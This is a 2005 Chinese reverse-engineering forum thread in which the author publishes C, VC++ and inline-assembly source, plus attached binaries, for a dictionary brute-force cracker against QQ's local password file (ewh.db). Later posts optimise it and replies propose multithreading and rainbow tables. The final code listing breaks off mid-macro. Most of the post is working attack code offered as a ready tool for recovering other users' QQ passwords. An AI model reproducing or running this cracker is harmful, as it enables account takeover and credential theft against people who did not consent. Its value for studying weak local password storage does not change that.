首页
社区
课程
招聘
[原创]QQ本地密码文件暴力破解代码
发表于: 2005-10-31 22:26 41666

[原创]QQ本地密码文件暴力破解代码

2005-10-31 22:26
41666

作者:冲出宇宙
作者声明:任何人都可以使用任何方式对本代码进行修改。

首先,向兄弟们表示严重的歉意。去年我写的那篇关于QQ本地密码文件格式的帖子,由于我的疏忽,把最后那个等式抄写错了。这个问题我最近才看到,之前我去研究其他东西去了。原贴见:"http://bbs.pediy.com/printthread.php?threadid=7933"
错误的地方是:
3)for(i=0;i<16;i++)
{
m[i]=(!m[i])^al;//al在这里指的是密码块数据的长度
//上面的文件中al=10h;
}
这里,应该是:m[i] = not (m[i] xor al),al=0x10;

昨天我无意中发现这个问题后,十分羞愧。我对我自己极不负责任的态度十分不满。为了向兄弟们表示歉意。特制作了一个简单的QQ本地密码文件暴力破解软件。
下面说一下其构成及源代码:
1 构成:VB程序调用VC编写的OCX,这样做是为了方面大家自己做界面。
2 OCX的输出函数:只有一个:void CQQDecoderCtrl::Decoder(LPCTSTR fileQQ, LPCTSTR filePwd) ,第一个参数是QQ的密码文件,第二个参数是密码字典。
3 源代码:VB的源代码不作介绍了,附件里面有。这里只说明一下VC的源代码(附件里面也有)。

//Md5算法
typedef unsigned char UI8;
typedef char I8;
typedef unsigned long UI32;

//F, G, H and I are basic MD5 functions.
#define md5_F(x, y, z) (((x) & (y)) | ((~x) & (z)))
#define md5_G(x, y, z) (((x) & (z)) | ((y) & (~z)))
#define md5_H(x, y, z) ((x) ^ (y) ^ (z))
#define md5_I(x, y, z) ((y) ^ ((x) | (~z)))

// ROTATE_LEFT rotates x left n bits.
//        x<<<=n;
#define md5_ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n))))

// FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4.
//Rotation is separate from addition to prevent recomputation.
#define md5_FF(a, b, c, d, x, s, ac) { \
        (a) += md5_F ((b), (c), (d)) + (x) + (ac); \
        (a) = md5_ROTATE_LEFT ((a), (s)); \
        (a) += (b); \
}
#define md5_GG(a, b, c, d, x, s, ac) { \
        (a) += md5_G ((b), (c), (d)) + (x) + (ac); \
        (a) = md5_ROTATE_LEFT ((a), (s)); \
        (a) += (b); \
}
#define md5_HH(a, b, c, d, x, s, ac) { \
        (a) += md5_H ((b), (c), (d)) + (x) + (ac); \
        (a) = md5_ROTATE_LEFT ((a), (s)); \
        (a) += (b); \
}
#define md5_II(a, b, c, d, x, s, ac) { \
        (a) += md5_I ((b), (c), (d)) + (x) + (ac); \
        (a) = md5_ROTATE_LEFT ((a), (s)); \
        (a) += (b); \
}

// Constants for MD5Transform routine.
#define md5_S11 7
#define md5_S12 12
#define md5_S13 17
#define md5_S14 22
#define md5_S21 5
#define md5_S22 9
#define md5_S23 14
#define md5_S24 20
#define md5_S31 4
#define md5_S32 11
#define md5_S33 16
#define md5_S34 23
#define md5_S41 6
#define md5_S42 10
#define md5_S43 15
#define md5_S44 21

//Md5Tranform代表了一轮md5变换
#define Md5Tranform \
        a = m_state[0];\
        b = m_state[1];\
        c = m_state[2];\
        d = m_state[3];\
        md5_FF (a, b, c, d, m_data[ 0], md5_S11, 0xd76aa478);\
        md5_FF (d, a, b, c, m_data[ 1], md5_S12, 0xe8c7b756);\
        md5_FF (c, d, a, b, m_data[ 2], md5_S13, 0x242070db);\
        md5_FF (b, c, d, a, m_data[ 3], md5_S14, 0xc1bdceee);\
        md5_FF (a, b, c, d, m_data[ 4], md5_S11, 0xf57c0faf);\
        md5_FF (d, a, b, c, m_data[ 5], md5_S12, 0x4787c62a);\
        md5_FF (c, d, a, b, m_data[ 6], md5_S13, 0xa8304613);\
        md5_FF (b, c, d, a, m_data[ 7], md5_S14, 0xfd469501);\
        md5_FF (a, b, c, d, m_data[ 8], md5_S11, 0x698098d8);\
        md5_FF (d, a, b, c, m_data[ 9], md5_S12, 0x8b44f7af);\
        md5_FF (c, d, a, b, m_data[10], md5_S13, 0xffff5bb1);\
        md5_FF (b, c, d, a, m_data[11], md5_S14, 0x895cd7be);\
        md5_FF (a, b, c, d, m_data[12], md5_S11, 0x6b901122);\
        md5_FF (d, a, b, c, m_data[13], md5_S12, 0xfd987193);\
        md5_FF (c, d, a, b, m_data[14], md5_S13, 0xa679438e);\
        md5_FF (b, c, d, a, m_data[15], md5_S14, 0x49b40821);\
        md5_GG (a, b, c, d, m_data[ 1], md5_S21, 0xf61e2562);\
        md5_GG (d, a, b, c, m_data[ 6], md5_S22, 0xc040b340);\
        md5_GG (c, d, a, b, m_data[11], md5_S23, 0x265e5a51);\
        md5_GG (b, c, d, a, m_data[ 0], md5_S24, 0xe9b6c7aa);\
        md5_GG (a, b, c, d, m_data[ 5], md5_S21, 0xd62f105d);\
        md5_GG (d, a, b, c, m_data[10], md5_S22,  0x2441453);\
        md5_GG (c, d, a, b, m_data[15], md5_S23, 0xd8a1e681);\
        md5_GG (b, c, d, a, m_data[ 4], md5_S24, 0xe7d3fbc8);\
        md5_GG (a, b, c, d, m_data[ 9], md5_S21, 0x21e1cde6);\
        md5_GG (d, a, b, c, m_data[14], md5_S22, 0xc33707d6);\
        md5_GG (c, d, a, b, m_data[ 3], md5_S23, 0xf4d50d87);\
        md5_GG (b, c, d, a, m_data[ 8], md5_S24, 0x455a14ed);\
        md5_GG (a, b, c, d, m_data[13], md5_S21, 0xa9e3e905);\
        md5_GG (d, a, b, c, m_data[ 2], md5_S22, 0xfcefa3f8);\
        md5_GG (c, d, a, b, m_data[ 7], md5_S23, 0x676f02d9);\
        md5_GG (b, c, d, a, m_data[12], md5_S24, 0x8d2a4c8a);\
        md5_HH (a, b, c, d, m_data[ 5], md5_S31, 0xfffa3942);\
        md5_HH (d, a, b, c, m_data[ 8], md5_S32, 0x8771f681);\
        md5_HH (c, d, a, b, m_data[11], md5_S33, 0x6d9d6122);\
        md5_HH (b, c, d, a, m_data[14], md5_S34, 0xfde5380c);\
        md5_HH (a, b, c, d, m_data[ 1], md5_S31, 0xa4beea44);\
        md5_HH (d, a, b, c, m_data[ 4], md5_S32, 0x4bdecfa9);\
        md5_HH (c, d, a, b, m_data[ 7], md5_S33, 0xf6bb4b60);\
        md5_HH (b, c, d, a, m_data[10], md5_S34, 0xbebfbc70);\
        md5_HH (a, b, c, d, m_data[13], md5_S31, 0x289b7ec6);\
        md5_HH (d, a, b, c, m_data[ 0], md5_S32, 0xeaa127fa);\
        md5_HH (c, d, a, b, m_data[ 3], md5_S33, 0xd4ef3085);\
        md5_HH (b, c, d, a, m_data[ 6], md5_S34,  0x4881d05);\
        md5_HH (a, b, c, d, m_data[ 9], md5_S31, 0xd9d4d039);\
        md5_HH (d, a, b, c, m_data[12], md5_S32, 0xe6db99e5);\
        md5_HH (c, d, a, b, m_data[15], md5_S33, 0x1fa27cf8);\
        md5_HH (b, c, d, a, m_data[ 2], md5_S34, 0xc4ac5665);\
        md5_II (a, b, c, d, m_data[ 0], md5_S41, 0xf4292244);\
        md5_II (d, a, b, c, m_data[ 7], md5_S42, 0x432aff97);\
        md5_II (c, d, a, b, m_data[14], md5_S43, 0xab9423a7);\
        md5_II (b, c, d, a, m_data[ 5], md5_S44, 0xfc93a039);\
        md5_II (a, b, c, d, m_data[12], md5_S41, 0x655b59c3);\
        md5_II (d, a, b, c, m_data[ 3], md5_S42, 0x8f0ccc92);\
        md5_II (c, d, a, b, m_data[10], md5_S43, 0xffeff47d);\
        md5_II (b, c, d, a, m_data[ 1], md5_S44, 0x85845dd1);\
        md5_II (a, b, c, d, m_data[ 8], md5_S41, 0x6fa87e4f);\
        md5_II (d, a, b, c, m_data[15], md5_S42, 0xfe2ce6e0);\
        md5_II (c, d, a, b, m_data[ 6], md5_S43, 0xa3014314);\
        md5_II (b, c, d, a, m_data[13], md5_S44, 0x4e0811a1);\
        md5_II (a, b, c, d, m_data[ 4], md5_S41, 0xf7537e82);\
        md5_II (d, a, b, c, m_data[11], md5_S42, 0xbd3af235);\
        md5_II (c, d, a, b, m_data[ 2], md5_S43, 0x2ad7d2bb);\
        md5_II (b, c, d, a, m_data[ 9], md5_S44, 0xeb86d391);\
        m_state[0] += a;\
        m_state[1] += b;\
        m_state[2] += c;\
        m_state[3] += d;\

///////////////////////////////////////
// QQ解密正式开始
//////////////////////////////////////
//作者:冲出宇宙
//2005,11,1
//////////////////////////////////////
UI8 MD5Result[16];        //md5加密后的结果
UI32 LoopNum;                //循环次数
UI32 QQNum;                //qq号码
UI32 PwdNum;                //已经对多少个字符串进行了检查
CString Pwd;                //当前正确的密码
CString FileQQ,FilePwd;        //密码文件和密码字典文件

DWORD DecodeThreadId;       
HANDLE DecodeThreadHandle;        //解密线程

CQQDecoderCtrl *Me;

//密码是否正确
bool IsPasswordCorrect(char* sPwd)
{
        UI32 m_state[4],m_data[16];
        register UI32 a,b,c,d;
        m_state[0] = 0x67452301L;
        m_state[1] = 0xefcdab89L;
        m_state[2] = 0x98badcfeL;
        m_state[3] = 0x10325476L;
        a = strlen(sPwd);
        memset(m_data,0,64);
        memcpy(m_data,sPwd,a);
        m_data[14] = a*8;
        ((UI8*)m_data)[a] = 0x80;
        Md5Tranform;
        memcpy(m_data,m_state,16);
        m_data[4] = 0x80;
        m_data[14] = 0x80;
        //主要轮次
        for(UI32 i=1;i<LoopNum;i++)       
        {
                m_state[0] = 0x67452301L;
                m_state[1] = 0xefcdab89L;
                m_state[2] = 0x98badcfeL;
                m_state[3] = 0x10325476L;
                Md5Tranform;
                m_data[0] = m_state[0];
                m_data[1] = m_state[1];
                m_data[2] = m_state[2];
                m_data[3] = m_state[3];
        }
        if(memcmp(MD5Result,m_state,16) == 0)        return true;
        return false;
}

//fileQQ:QQ密码文件(ewh.db)
//filePwd:密码字典文件(*.txt),格式参见测试用例
void CQQDecoderCtrl::Decoder(LPCTSTR fileQQ, LPCTSTR filePwd)
{
        FileQQ        = fileQQ;
        FilePwd = filePwd;
        Me = this;
        //建立解码线程
        DecodeThreadHandle = ::CreateThread(0,0,DecodeThread,0,0,&DecodeThreadId);
        if(!DecodeThreadHandle)
        {
                return;
        }
        ::CloseHandle(DecodeThreadHandle);
}

//解密线程
DWORD WINAPI CQQDecoderCtrl::DecodeThread(LPVOID arg)
{
        UI32 i;
        UI8 buffer[60];
        CString strPwd;
        BOOL flag;
       
        PwdNum = 0;
        //读取QQ密码文件
        CFile fQQ(FileQQ,CFile::modeRead);
        fQQ.Read(buffer,60);
        fQQ.Close();
        LoopNum = ((UI32*)buffer)[4];        //得到循环次数
        QQNum = ((UI32*)buffer)[14];        //得到QQ号码
        for(i=0;i<16;i++)        MD5Result[i] = ((~buffer[30+i])^0x10);        //得到md5结果
        //读取密码字典文件
        CFile fPwd(FilePwd,CFile::modeRead);
        CArchive cPwd(&fPwd,CArchive::load);
        //测试密码
        flag = TRUE;
        while(TRUE == flag)
        {
                for(i=0;i<10;i++)
                {
                        flag = cPwd.ReadString(strPwd);
                        if(flag == FALSE)
                        {
                                break;
                        }
                        else
                        {
                                //判断密码是否正确
                                if(true == IsPasswordCorrect((char*)(LPCTSTR)strPwd))
                                {
                                        Pwd = strPwd;
                                        ::PostMessage((HWND)(Me->GetHwnd()),WM_TIMER,2,0);
                                        cPwd.Close();
                                        fPwd.Close();               
                                        return 0;
                                }
                        }
                        PwdNum ++;
                }
                //激发已经检查过的密码个数事件
                ::PostMessage((HWND)(Me->GetHwnd()),WM_TIMER,1,0);       
        }
        //激发已经检查过的密码个数事件
        ::PostMessage((HWND)(Me->GetHwnd()),WM_TIMER,1,0);       
        //激发已经检查完毕事件
        ::PostMessage((HWND)(Me->GetHwnd()),WM_TIMER,3,0);       
        //关闭文件
        cPwd.Close();
        fPwd.Close();
        return 0;
}
//发送ocx的事件
void CQQDecoderCtrl::OnTimer(UINT nIDEvent)
{
        switch(nIDEvent)        //由此来判断该发送什么事件出去
        {
        case 1:        //解密进行中
                this->FireDecoding(PwdNum);
                break;;
        case 2:        //发现新密码
                this->FireValidPwdFound(Pwd);
                break;;
        case 3:        //解密完成
                this->FireDecodeOver(0);
                break;
        }       
}

Md5算法十分清晰。所以,速度不是特别快。根据测试,大约每秒可以测试5个密码。
附件有4个文件,分别是:

QQSrc.rar  包含vc编写的ocx源代码和vb编写程序的源代码
QQ.rar     包含ocx和vb编写的程序,暴力破解程序就在这里

test.rar 包含2个文件:

ewh.db     测试密码文件。就是我以前的密码文件,密码现在已经修改了
pwd.txt    测试字典文件。

附件:qq.rar 附件:qqsrc.rar 附件:test.rar

10.2 号更新:。。。。。。。。。。。。。。。。。。

QQ暴力破解程序终极优化。
经过认真的排列汇编语言的顺序后,程序现在能做440万次轮转/秒。所以,检测速度上升到10个/秒左右。以下是其主要代码。附件是最新QQ暴力破解程序。

//Md5算法
typedef unsigned char UI8;
typedef char I8;
typedef unsigned long UI32;

#define md5_S11 25
#define md5_S12 20
#define md5_S13 15
#define md5_S14 10
#define md5_S21 27
#define md5_S22 23
#define md5_S23 18
#define md5_S24 12
#define md5_S31 28
#define md5_S32 21
#define md5_S33 16
#define md5_S34 9
#define md5_S41 26
#define md5_S42 22
#define md5_S43 17
#define md5_S44 11

#define md5_S110 7
#define md5_S120 12
#define md5_S130 17
#define md5_S140 22
#define md5_S210 5
#define md5_S220 9
#define md5_S230 14
#define md5_S240 20
#define md5_S310 4
#define md5_S320 11
#define md5_S330 16
#define md5_S340 23
#define md5_S410 6
#define md5_S420 10
#define md5_S430 15
#define md5_S440 21
//非mmx实现
//思想:
//        a,b,c,d保存在eax,ebx,ecx,edx
//  m_data[0]-m_data[3]保存在mm0,mm1,mm2,mm3
//        esi和edi做temp

#define a eax
#define b ebx
#define c ecx
#define d edx

//以下结果均在esi中
// f(x,y,z) = (x and y) or (not(x) and z)
//                        = ((y xor z) and x) xor z
#define F(x,y,z) \
        __asm mov esi,y \
        __asm xor esi,z \
        __asm and esi,x \
        __asm xor esi,z

//g(x,y,z)        = (x and z) or (y and not(z))
//                        = ((x xor y) and z) xor y
#define G(x,y,z) \
        __asm mov esi,x \
        __asm xor esi,y \
        __asm and esi,z \
        __asm xor esi,y

//h(x,y,z) = x xor y xor z
#define H(x,y,z) \
        __asm mov esi,x \
        __asm xor esi,y \
        __asm xor esi,z

//I(x,y,z) = y xor (x or not(z))
#define I(x,y,z) \
        __asm mov esi,z \
        __asm not esi \
        __asm or esi,x \
        __asm xor esi,y

//第一个FF,就是不需要加任何东西上去
#define md5_FF0(a0,b0,c0,d0,s0,s1,ac) \
        F(b0,c0,d0) \
        __asm add a0,esi \
        __asm add a0,ac \
        __asm rol a0,s1 \
        __asm add a0,b0
//当x数组数据不为0时
#define md5_FF1(a0,b0,c0,d0,s0,s1,ac) \
        F(b0,c0,d0) \
        __asm movd edi,mm0 \
        __asm add a0,esi \
        __asm add edi,ac \
        __asm add a0,edi \
        __asm rol a0,s1 \
        __asm add a0,b0

#define md5_FF2(a0,b0,c0,d0,s0,s1,ac) \
        F(b0,c0,d0) \
        __asm movd edi,mm1 \
        __asm add a0,esi \
        __asm add edi,ac \
        __asm add a0,edi \
        __asm rol a0,s1 \
__asm add a0,b0

#define md5_FF3(a0,b0,c0,d0,s0,s1,ac) \
        F(b0,c0,d0) \
        __asm movd edi,mm2 \
        __asm add a0,esi \
        __asm add edi,ac \
        __asm add a0,edi \
        __asm rol a0,s1 \
__asm add a0,b0

#define md5_FF4(a0,b0,c0,d0,s0,s1,ac) \
        F(b0,c0,d0) \
        __asm movd edi,mm3 \
        __asm add a0,esi \
        __asm add edi,ac \
        __asm add a0,edi \
        __asm rol a0,s1 \
__asm add a0,b0

//第一个GG,就是不需要加任何东西上去
#define md5_GG0(a0,b0,c0,d0,s0,s1,ac) \
        G(b0,c0,d0) \
        __asm add a0,esi \
        __asm add a0,ac \
        __asm rol a0,s1 \
__asm add a0,b0
//当x数组数据不为0时
#define md5_GG1(a0,b0,c0,d0,s0,s1,ac) \
        G(b0,c0,d0) \
        __asm movd edi,mm0 \
        __asm add a0,esi \
        __asm add edi,ac \
        __asm add a0,edi \
        __asm rol a0,s1 \
__asm add a0,b0

#define md5_GG2(a0,b0,c0,d0,s0,s1,ac) \
        G(b0,c0,d0) \
        __asm movd edi,mm1 \
        __asm add a0,esi \
        __asm add edi,ac \
        __asm add a0,edi \
        __asm rol a0,s1 \
__asm add a0,b0

#define md5_GG3(a0,b0,c0,d0,s0,s1,ac) \
        G(b0,c0,d0) \
        __asm movd edi,mm2 \
        __asm add a0,esi \
        __asm add edi,ac \
        __asm add a0,edi \
        __asm rol a0,s1 \
__asm add a0,b0

#define md5_GG4(a0,b0,c0,d0,s0,s1,ac) \
        G(b0,c0,d0) \
        __asm movd edi,mm3 \
        __asm add a0,esi \
        __asm add edi,ac \
        __asm add a0,edi \
        __asm rol a0,s1 \
__asm add a0,b0

//第一个HH,就是不需要加任何东西上去
#define md5_HH0(a0,b0,c0,d0,s0,s1,ac) \
        H(b0,c0,d0) \
        __asm add a0,esi \
        __asm add a0,ac \
        __asm rol a0,s1 \
__asm add a0,b0
//当x数组数据不为0时
#define md5_HH1(a0,b0,c0,d0,s0,s1,ac) \
        H(b0,c0,d0) \
        __asm movd edi,mm0 \
        __asm add a0,esi \
        __asm add edi,ac \
        __asm add a0,edi \
        __asm rol a0,s1 \
__asm add a0,b0

#define md5_HH2(a0,b0,c0,d0,s0,s1,ac) \
        H(b0,c0,d0) \
        __asm movd edi,mm1 \
        __asm add a0,esi \
        __asm add edi,ac \
        __asm add a0,edi \
        __asm rol a0,s1 \
__asm add a0,b0

#define md5_HH3(a0,b0,c0,d0,s0,s1,ac) \
        H(b0,c0,d0) \
        __asm movd edi,mm2 \
        __asm add a0,esi \
        __asm add edi,ac \
        __asm add a0,edi \
        __asm rol a0,s1 \
__asm add a0,b0

#define md5_HH4(a0,b0,c0,d0,s0,s1,ac) \
        H(b0,c0,d0) \
        __asm movd edi,mm3 \
        __asm add a0,esi \
        __asm add edi,ac \
        __asm add a0,edi \
        __asm rol a0,s1 \
__asm add a0,b0

//第一个II,就是不需要加任何东西上去
#define md5_II0(a0,b0,c0,d0,s0,s1,ac) \
        I(b0,c0,d0) \
        __asm add a0,esi \
        __asm add a0,ac \
        __asm rol a0,s1 \
__asm add a0,b0
//当x数组数据不为0时
#define md5_II1(a0,b0,c0,d0,s0,s1,ac) \
        I(b0,c0,d0) \
        __asm movd edi,mm0 \
        __asm add a0,esi \
        __asm add edi,ac \
        __asm add a0,edi \
        __asm rol a0,s1 \
__asm add a0,b0

#define md5_II2(a0,b0,c0,d0,s0,s1,ac) \
        I(b0,c0,d0) \
        __asm movd edi,mm1 \
        __asm add a0,esi \
        __asm add edi,ac \
        __asm add a0,edi \
        __asm rol a0,s1 \
__asm add a0,b0

#define md5_II3(a0,b0,c0,d0,s0,s1,ac) \
        I(b0,c0,d0) \
        __asm movd edi,mm2 \
        __asm add a0,esi \
        __asm add edi,ac \
        __asm add a0,edi \
        __asm rol a0,s1 \
__asm add a0,b0

#define md5_II4(a0,b0,c0,d0,s0,s1,ac) \
        I(b0,c0,d0) \
        __asm movd edi,mm3 \
        __asm add a0,esi \
        __asm add edi,ac \
        __asm add a0,edi \
        __asm rol a0,s1 \
__asm add a0,b0

///////////////////////////////////////
// QQ解密正式开始
//////////////////////////////////////
//作者:冲出宇宙
//2005,11,1
//////////////////////////////////////
UI8 MD5Result[16];        //md5加密后的结果
UI32 LoopNum;                //循环次数
UI32 QQNum;                        //qq号码
UI32 PwdNum;                //已经对多少个字符串进行了检查
CString Pwd;                //当前正确的密码
CString FileQQ,FilePwd;        //密码文件和密码字典文件

DWORD DecodeThreadId;       
HANDLE DecodeThreadHandle;        //解密线程

CQQDecoderCtrl *Me;

//密码是否正确,每次测试2个密码
bool IsPasswordCorrect(char* sPwd0)
{
        UI32 i,dataIn0[4];
        MD5 md5;
        //第一轮
        md5.Hash((UI8*)dataIn0,(UI8*)sPwd0,strlen(sPwd0));

        __asm pushad;
        //准备输入数据
        __asm
        {
                //1,m_data[0]
                mov esi,[dataIn0];
                movd mm0,esi;
                //2,
                mov esi,[dataIn0+4];
                movd mm1,esi;
                //3,
                mov esi,[dataIn0+8];
                movd mm2,esi;
                //4,
                mov esi,[dataIn0+12];
                movd mm3,esi;
        }
        //主要轮次
        __asm
        {
                push ebp;
                mov ebp,LoopNum;
        }
Begin:
        __asm
        {
                dec ebp;
                cmp ebp,0;
                je End;
               
                __asm
                {
                        mov a,0x67452301;
                        mov b,0xefcdab89;
                        mov c,0x98badcfe;
                        mov d,0x10325476;
                }

                md5_FF1 (a, b, c, d,  md5_S11, md5_S110,0xd76aa478);
                md5_FF2 (d, a, b, c,  md5_S12,  md5_S120,0xe8c7b756);
                md5_FF3 (c, d, a, b,  md5_S13, md5_S130,0x242070db);
                md5_FF4 (b, c, d, a,  md5_S14, md5_S140,0xc1bdceee);
                md5_FF0 (a, b, c, d,  md5_S11,  md5_S110,0xf57c102f);
                md5_FF0 (d, a, b, c, md5_S12, md5_S120,0x4787c62a);
                md5_FF0 (c, d, a, b, md5_S13, md5_S130,0xa8304613);
                md5_FF0 (b, c, d, a, md5_S14, md5_S140,0xfd469501);
                md5_FF0 (a, b, c, d, md5_S11,md5_S110, 0x698098d8);
                md5_FF0 (d, a, b, c, md5_S12, md5_S120,0x8b44f7af);
                md5_FF0 (c, d, a, b, md5_S13,  md5_S130,0xffff5bb1);
                md5_FF0 (b, c, d, a, md5_S14, md5_S140,0x895cd7be);
                md5_FF0 (a, b, c, d, md5_S11, md5_S110,0x6b901122);
                md5_FF0 (d, a, b, c, md5_S12, md5_S120,0xfd987193);
                md5_FF0 (c, d, a, b,md5_S13, md5_S130,0xa679440e);
                md5_FF0 (b, c, d, a, md5_S14,  md5_S140,0x49b40821);
               
                md5_GG2 (a, b, c, d,md5_S21, md5_S210,0xf61e2562);
                md5_GG0 (d, a, b, c, md5_S22, md5_S220,0xc040b340);
                md5_GG0 (c, d, a, b, md5_S23, md5_S230,0x265e5a51);
                md5_GG1 (b, c, d, a,md5_S24, md5_S240,0xe9b6c7aa);
                md5_GG0 (a, b, c, d, md5_S21, md5_S210,0xd62f105d);
                md5_GG0 (d, a, b, c, md5_S22, md5_S220, 0x2441453);
                md5_GG0 (c, d, a, b, md5_S23, md5_S230,0xd8a1e681);
                md5_GG0 (b, c, d, a, md5_S24, md5_S240,0xe7d3fc48);
                md5_GG0 (a, b, c, d, md5_S21, md5_S210,0x21e1cde6);
                md5_GG0 (d, a, b, c, md5_S22, md5_S220,0xc3370856);
                md5_GG4 (c, d, a, b,md5_S23, md5_S230,0xf4d50d87);
                md5_GG0 (b, c, d, a, md5_S24, md5_S240,0x455a14ed);
                md5_GG0 (a, b, c, d, md5_S21, md5_S210,0xa9e3e905);
                md5_GG3 (d, a, b, c,md5_S22, md5_S220,0xfcefa3f8);
                md5_GG0 (c, d, a, b, md5_S23, md5_S230,0x676f02d9);
                md5_GG0 (b, c, d, a, md5_S24,md5_S240, 0x8d2a4c8a);
               
                md5_HH0 (a, b, c, d, md5_S31, md5_S310,0xfffa3942);
                md5_HH0 (d, a, b, c, md5_S32, md5_S320,0x8771f681);
                md5_HH0 (c, d, a, b, md5_S33, md5_S330,0x6d9d6122);
                md5_HH0 (b, c, d, a, md5_S34, md5_S340,0xfde5388c);
                md5_HH2 (a, b, c, d,md5_S31, md5_S310,0xa4beea44);
                md5_HH0 (d, a, b, c, md5_S32, md5_S320,0x4bded029);
                md5_HH0 (c, d, a, b, md5_S33, md5_S330,0xf6bb4b60);
                md5_HH0 (b, c, d, a, md5_S34, md5_S340,0xbebfbc70);
                md5_HH0 (a, b, c, d, md5_S31, md5_S310,0x289b7ec6);
                md5_HH1 (d, a, b, c,md5_S32, md5_S320,0xeaa127fa);
                md5_HH4 (c, d, a, b,md5_S33, md5_S330,0xd4ef3085);
                md5_HH0 (b, c, d, a, md5_S34, md5_S340, 0x4881d05);
                md5_HH0 (a, b, c, d, md5_S31, md5_S310,0xd9d4d039);
                md5_HH0 (d, a, b, c, md5_S32, md5_S320,0xe6db99e5);
                md5_HH0 (c, d, a, b, md5_S33, md5_S330,0x1fa27cf8);
                md5_HH3 (b, c, d, a,md5_S34, md5_S340,0xc4ac5665);
               
               
                md5_II1 (a, b, c, d,md5_S41, md5_S410,0xf4292244);
                md5_II0 (d, a, b, c, md5_S42,  md5_S420,0x432aff97);
                md5_II0 (c, d, a, b, md5_S43, md5_S430,0xab942427);
                md5_II0 (b, c, d, a, md5_S44, md5_S440,0xfc93a039);
                md5_II0 (a, b, c, d, md5_S41, md5_S410,0x655b59c3);
                md5_II4 (d, a, b, c,md5_S42, md5_S420,0x8f0ccc92);
                md5_II0 (c, d, a, b, md5_S43, md5_S430,0xffeff47d);
                md5_II2 (b, c, d, a, md5_S44, md5_S440,0x85845dd1);
                md5_II0 (a, b, c, d, md5_S41, md5_S410,0x6fa87e4f);
                md5_II0 (d, a, b, c, md5_S42, md5_S420,0xfe2ce6e0);
                md5_II0 (c, d, a, b, md5_S43,md5_S430, 0xa3014314);
                md5_II0 (b, c, d, a, md5_S44, md5_S440,0x4e0811a1);
                md5_II0 (a, b, c, d, md5_S41,md5_S410, 0xf7537f02);
                md5_II0 (d, a, b, c, md5_S42,md5_S420, 0xbd3af235);
                md5_II3 (c, d, a, b, md5_S43, md5_S430, 0x2ad7d2bb);
                md5_II0 (b, c, d, a, md5_S44, md5_S440,0xeb86d391);
               
                __asm
                {
                        add a,0x67452301;
                        add b,0xefcdab89;
                        add c,0x98badcfe;
                        add d,0x10325476;
                        movd mm0,a;
                        movd mm1,b;
                        movd mm2,c;
                        movd mm3,d;
                }
                jmp Begin;
        }
End:
        //输出数据
        __asm
        {
                pop ebp;
                mov [dataIn0],eax;
                mov [dataIn0+4],ebx;
                mov [dataIn0+8],ecx;
                mov [dataIn0+12],edx;
                emms;
        }
        __asm popad;

        if(memcmp(MD5Result,dataIn0,16) == 0)        return true;
        return false;
}

附件只包括QQ本地密码暴力破解程序。不包括源代码。
附件:qqdecoder.rar


[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 7
支持
分享
最新回复 (31)
雪    币: 156
活跃值: (48)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
2
还想问问 tencent的 rtx 本地密码用什么加密的?
2005-11-1 08:32
0
雪    币: 205
活跃值: (171)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
3
这和binary的那篇QQ的文章有何区别?
2005-11-1 11:18
0
雪    币: 50
活跃值: (145)
能力值: ( LV12,RANK:290 )
在线值:
发帖
回帖
粉丝
4
本地验证可太不安全啦
2005-11-1 13:01
0
雪    币: 235
活跃值: (190)
能力值: ( LV12,RANK:210 )
在线值:
发帖
回帖
粉丝
5
经过思考之后,如果使用mmx指令和考虑到md5输入数据的特性,有办法把md5的加密速度提高3倍。
只是比较麻烦。

如果有兄弟真的需要这个暴力破解程序的话,大家可以一起来加速它。
现在的速度是220万轮/秒。在1.8G的机器上面。
2005-11-1 13:22
0
雪    币: 389
活跃值: (912)
能力值: ( LV9,RANK:770 )
在线值:
发帖
回帖
粉丝
6
学习.
2005-11-1 13:44
0
雪    币: 671
活跃值: (723)
能力值: ( LV9,RANK:1060 )
在线值:
发帖
回帖
粉丝
7
到此一游,文章不错,谢谢提供。
2005-11-1 14:13
0
雪    币: 205
活跃值: (171)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
8
最初由 lotusroots 发布
经过思考之后,如果使用mmx指令和考虑到md5输入数据的特性,有办法把md5的加密速度提高3倍。
只是比较麻烦。

如果有兄弟真的需要这个暴力破解程序的话,大家可以一起来加速它。
现在的速度是220万轮/秒。在1.8G的机器上面。


楼主,还有qq啊,私下交流一下?呵呵:36367977

希望楼主能够考虑如下方面:
1.采用速度更快的汇编内核的md5代码
2.多线程实现(在配置更高的机子跑)
3.预存储机制(采用彩虹系列的链表结构实现,可将存储空间大大降低)
2005-11-1 14:27
0
雪    币: 235
活跃值: (190)
能力值: ( LV12,RANK:210 )
在线值:
发帖
回帖
粉丝
9
上述算法的简单汇编实现。

一下代码由http://bbs.pediy.com/showthread.php?s=&threadid=11673 这里给出的md5的汇编实现转化过来。

然而,这个代码的运行速度和源代码经过优化后的运行速度一样。速度上没有任何改观。

//Md5算法
typedef unsigned char UI8;
typedef char I8;
typedef unsigned long UI32;

#define S11 7
#define S12 12
#define S13 17
#define S14 22
#define S21 5
#define S22 9
#define S23 14
#define S24 20
#define S31 4
#define S32 11
#define S33 16
#define S34 23
#define S41 6
#define S42 10
#define S43 15
#define S44 21

#define a esi
#define b edi
#define c edx
#define d ebx
#define tmp1 eax
#define tmp2 ecx

#define x(i) [x+4*i]

#define FF(a, b, c, d, x, s, ac) \
        __asm mov tmp1,b \
        __asm and tmp1,c \
        __asm mov tmp2,b \
        __asm not tmp2 \
        __asm and tmp2,d \
        __asm or tmp2,tmp1 \
        __asm lea a,[tmp2+a+ac] \
        __asm add a,x \
        __asm rol a,s \
        __asm add a,b \
       
#define GG(a, b, c, d, x, s, ac) \
        __asm mov tmp1,b \
        __asm and tmp1,d \
        __asm mov tmp2,d \
        __asm not tmp2 \
        __asm and tmp2,c \
        __asm or tmp2,tmp1 \
        __asm lea a,[tmp2+a+ac] \
        __asm add a,x \
        __asm rol a,s \
        __asm add a,b

#define HH(a,b,c, d, x, s, ac) \
        __asm mov tmp2,b \
        __asm xor tmp2,c \
        __asm xor tmp2,d \
        __asm lea a,[tmp2+a+ac] \
        __asm add a,x \
        __asm rol a,s \
        __asm add a,b

#define II(a, b, c, d, x, s, ac) \
        __asm mov tmp2,d \
        __asm not tmp2 \
        __asm or tmp2,b \
        __asm xor tmp2,c \
